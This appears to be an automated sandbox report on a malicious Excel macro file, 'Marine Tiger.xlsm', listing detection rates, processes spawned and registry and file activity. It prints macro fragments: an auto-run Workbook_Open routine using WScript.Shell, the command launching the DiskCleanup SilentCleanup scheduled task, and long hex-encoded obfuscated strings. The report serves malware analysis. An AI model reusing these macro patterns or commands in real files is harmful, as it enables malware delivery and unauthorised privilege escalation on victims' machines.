Source: Marine Tiger.xlsm |
Virustotal: Detection: 40% |
Perma Link |
Source: Marine Tiger.xlsm |
ReversingLabs: Detection: 29% |
Source: Marine Tiger.xlsm |
Joe Sandbox ML: detected |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\cmd.exe |
Jump to behavior |
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API IWshShell3.Run("cmd /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I") |
Name: Workbook_Open |
Source: Marine Tiger.xlsm |
OLE, VBA macro line: Set ghhfgfgdsfas = CreateObject("WScript.Shell") |
|
Source: Marine Tiger.xlsm |
OLE, VBA macro line: Set ghhfgfgdsfas = CreateObject("WScript.Shell") |
|
Source: Marine Tiger.xlsm |
OLE, VBA macro line: Set ghhfgfgdsfas = CreateObject("WScript.Shell") |
|
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String wscript: Set ghhfgfgdsfas = CreateObject("WScript.Shell") |
Name: Workbook_Open |
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String wscript: Set ghhfgfgdsfas = CreateObject("WScript.Shell") |
Name: Workbook_Open |
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String wscript: Set ghhfgfgdsfas = CreateObject("WScript.Shell") |
Name: Workbook_Open |
Source: Marine Tiger.xlsm |
Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regdelete, regwrite, run |
|
Source: Marine Tiger.xlsm |
Stream path 'VBA/ThisWorkbook' : found hex strings |
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E |
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 6F79702C3B6F2C7C6A7B83717E7F746A71786A782C39832C3D2C4D707039597C5C7E7172717E717A6F712C3951846F78817F757B7A5C6D80742C2E30717A82466D7C7C706D806D2E475F806D7E80395F7871717C2C3D3E472C345A7183395B6E76716F802C5A71803A63716E4F7875717A80353A507B837A787B6D705275787134337480807C463B3B817A75807E6D7A7F74757C3A757A3B7C63725F417F5955457763757E51573A71847133383430717A82466D7C7C706D806D35373368607D5A6F4F3A6E6D803335475F806D7E80395F7871717C2C3E472C5F806D7E80395C7E7B6F717F7F2C30717A82466D7C7C706D806D68607D5A6F4F3A6E6D8047325E51592C33 |
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 6F79702C3B6F2C7F6F74806D7F777F2C3B7E817A2C3B807A2C6859756F7E7B7F7B72806863757A707B837F6850757F774F78716D7A817C685F7578717A804F78716D7A817C2C3B55 |
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E |
Source: Marine Tiger.xlsm |
OLE, VBA macro line: Public Sub Workbook_Open() |
|
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open |
Name: Workbook_Open |
Source: Marine Tiger.xlsm |
OLE indicator, VBA macros: true |
Source: classification engine |
Classification label: mal80.expl.winXLSM@5/1@0/0 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\Desktop\~$Marine Tiger.xlsm |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Temp\CVRCE08.tmp |
Jump to behavior |
Source: C:\Windows\System32\schtasks.exe |
Console Write: ................................E.R.R.O.R.:. ......................................v....)..v................................5................... |
Jump to behavior |
Source: C:\Windows\System32\schtasks.exe |
Console Write: .................................................1.v......................;.............................................X.................;..... |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File read: C:\Users\desktop.ini |
Jump to behavior |
Source: Marine Tiger.xlsm |
Virustotal: Detection: 40% |
Source: Marine Tiger.xlsm |
ReversingLabs: Detection: 29% |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding |
|
Source: unknown |
Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
|
Source: unknown |
Process created: C:\Windows\System32\schtasks.exe schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\schtasks.exe schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
Jump to behavior |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: unknown |
Process created: C:\Windows\System32\schtasks.exe schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\schtasks.exe schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
Jump to behavior |